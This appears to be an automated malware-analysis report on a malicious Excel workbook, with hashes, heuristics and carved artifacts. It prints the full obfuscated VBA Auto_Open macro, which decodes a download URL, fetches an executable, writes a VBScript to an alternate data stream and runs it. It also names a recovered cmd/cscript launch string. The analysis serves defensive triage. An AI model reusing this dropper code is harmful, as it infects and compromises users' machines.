Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cf2b1b64d0b964e1…

MALICIOUS

Office (OOXML)

44.4 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-05-25
MD5: 821d7e32f1b9a858eb05862f0b94a589 SHA-1: be584ba110bdc86c1fa392743e484951fec2efb8 SHA-256: cf2b1b64d0b964e10f876c7bc7c266d0d11b2bcec071350e7f7cc169b6cbc275
512 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Excel document containing a VBA macro that executes a Base64-decoded shell command. This command, reconstructed from the VBA code, is 'http://fjfkgnbaskfasd.com/appbeer.exe', indicating the macro's purpose is to download and execute a second-stage payload from this URL. The use of WScript.Shell and CreateObject further supports the malicious intent of executing external code.

Heuristics 14

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    s = s + "       sWScript = sWScript + "".""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       Execute(""l=m"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Path = "C:\Windows\System32\wscript.exe "
File = x + ":script1"
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://fjfkgnbaskfasd.com/appbeer.exe Referenced by macro

Extracted artifacts 9

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 14690 bytes
SHA-256: 5ed541e0ab91b6f122666aa9bdd17af40750ae3fafde1ec058059dab4360eb33
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf
s = s + "fsdfdsfs = ""aHR0cDovL2ZqZmtnbmJhc2tmYXNkLmNvbS9hcHBiZWVyLmV4ZQ=="" " + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky =""bW9iaWxlLmV4ZQ==""" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = ""bin""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""."" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""base""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""64"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim after, path'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "after = ""later"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE) '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    byteArray = alxmd.NodeTypedValue'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Someone I know recently combined Maple Syrup & buttered Popcorn thinking it would taste like caramel popcorn. It didn’t and they don’t recommend anyone else do it either.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        filestring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            'It would have been a better night if the guys next to us weren't in the splash zone.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            filestring = baax.ReadText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub tse64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Use an aux. XML document with a Base64-encoded element. '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Assigning the encoded text to .Text makes the decoded byte array'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' available via .nodeTypedValue, which we can pass to BytesToStr() '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    byteArray = alxmd.NodeTypedValue'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' UTF-16 LE happens to be VBScript's internal encoding, so we can'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' take a shortcut and use CStr() to directly convert the byte array'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' to a string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        linkstring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it. '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' Now change the type to text, set the encoding, and output the 'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' result as text. '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            linkstring = baax.ReadText '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call ase64Decode(yulkytjtrhtjrkdsarjky,False) 'filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call tse64Decode(fsdfdsfs,False) 'linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub HTxTPDownload( aa, bb )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   cobvar = ""Scripting.FileSystemObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Set fso = CreateObject(cobvar) '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = ""C:""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\program""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""data""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\asc.txt""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   If (fso.FileExists(path)) Then '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "     fso.DeleteFile(path)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" exists.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      Execute(""MyURL=aa:MyPath=bb"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      sWScript = ""WScript""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       sWScript = sWScript + "".""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       Execute(""l=m"") '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       set just_obj = CreateObject(l)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" doesn't exist.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim i, objFile, objFSO, objHTTP, strFile, strMsg'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Const ForReading = 1, ForWriting = 2, ForAppending = 8 '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objFSO = CreateObject(cobvar)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If objFSO.FolderExists( myPath ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) + 1 ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, ""\"" ) - 1 ) ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        'If any cop asks you where you were, just say you were visiting Kansas.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = myPath'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        Exit Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   'Set objHTTP = CreateObject( ""Microsoft.XMLHTTP"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   dim stream_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   ado = ""ADODB.Stream"" '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   set stream_obj = CreateObject(ado)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""objHT"" + ""TP."" + ""Open """"GET"""", myURL, False"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    objHTTP.Send'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.type = 1'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj."" + ""open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.write objHTTP.ResponseBody '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj.save"" + ""tofile strFile, 2"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Write the  byte stream to the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'For i = 1 To LenB( objHTTP.ResponseBody )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    '    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Next'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Close the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'objFile.Close( )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "End Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = ""C:"" + ""\Program"" + ""Data\"" + yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "fsdfdsfs = linkstring '37492'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "HTxTPDownload fsdfdsfs, yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim just_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "RUNC = yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "just_obj.exec RUNC" + vbCrLf

    On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)

    'If Error WS Does not exist
    If Err.Number <> 0 Then
        DoesWSExist = False
    Else '37492
        DoesWSExist = True '37492
    End If
 
    On Error GoTo -1
j = ".S" + "hell"
Range("A1:C1").Select

Selection.Font.Name = "Arial" '37492
Selection.Font.Bold = True
Selection.Font.Italic = True
Selection.Interior.Color = vbGreen
xzxz = "Ws" + "cr" + "ipt" + j
x = "C:"
x = x + "\program"
x = x + "data"
x = x + "\asc.txt"
Dim i As Integer
On Error GoTo Last
'ii = InputBox("Enter Value", "Enter Serial Numbers")
For i = 1 To i
ActiveCell.Offset(1, 0).Activate
Next i
Last:

On Error GoTo Handler '37492
Application.EnableEvents = False

Handler:
Dim gfdgfdgdf As Object
sdfsdfs = "Scri"
sdfsdfs = sdfsdfs + "pting."
smallvar = "File"
smallvar = smallvar + "SystemObject" '37492

Set gfdgfdgdf = CreateObject(sdfsdfs + smallvar)
Dim oFile As Object
'Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37492
Set oFile = gfdgfdgdf.CreateTextFile(x + ":script1.vbs")
    On Error Resume Next

    
    'If Error WS Does not exist
    If Err.Number <> 0 Then

    End If
 
    On Error GoTo -1
Application.Execute ("oFile.WriteLine s"): oFile.WriteLine s '#############################
'oFile.Close
Application.Execute (Selection.Font.Name = "Arial"): Set gfdgfdgdf = Nothing
Set oFile = Nothing '37492

Path = "C:\Windows\System32\wscript.exe "
File = x + ":script1"
File = File + "."
File = File + "vbs"

'The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.:x = Shell(Path + " " + File, vbNormalFocus)
x = Shell(Path + File, vbNormalFocus) ''The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.



End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject2.bin 9216 bytes
SHA-256: 4968fe911a1d287ec155d6acf5c74a0e3418412fd077d39ae9004ac61002e32d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37492, WScript = sWScript + "."
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native 6218 bytes
SHA-256: efcd6531e795b27c6e332c971be0c193debf005bc8015ba62a62fb5249631d37
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37492, WScript = sWScript + "."
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 3584 bytes
SHA-256: f10e87a1ef769de5ef7dc4d75faf1e5550dadd1f977942078c353c9abfe59175
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_01_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 963 bytes
SHA-256: 19826b726fda4ec24276468dce9fd7f5e94424a2e3975b310e7deec26fc3a68c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject3.bin 5936 bytes
SHA-256: e111e883c911154213c197eccb87e28d64dfb4b238e83194b1e5c55bfecfa494
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): cmd /c ren %tmp%\yy y.js&CSCRIPt %tmp%\y.js  C
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: xl/vbaProject.bin 35328 bytes
SHA-256: 8d081bb0f27d3e49d250183b1a0bd45f9f20a6bc5cad231c3818eda043d410ea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript = "WScript"'hu4u4hu4uh4uhu4hu4, WScript = sWScript + "."'hu4u4hu4uh4uhu4hu4, WScript + "Shell"'hu4u4hu4uh4uhu4hu4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f

Open this report in the interactive analyzer, or submit your own file for analysis.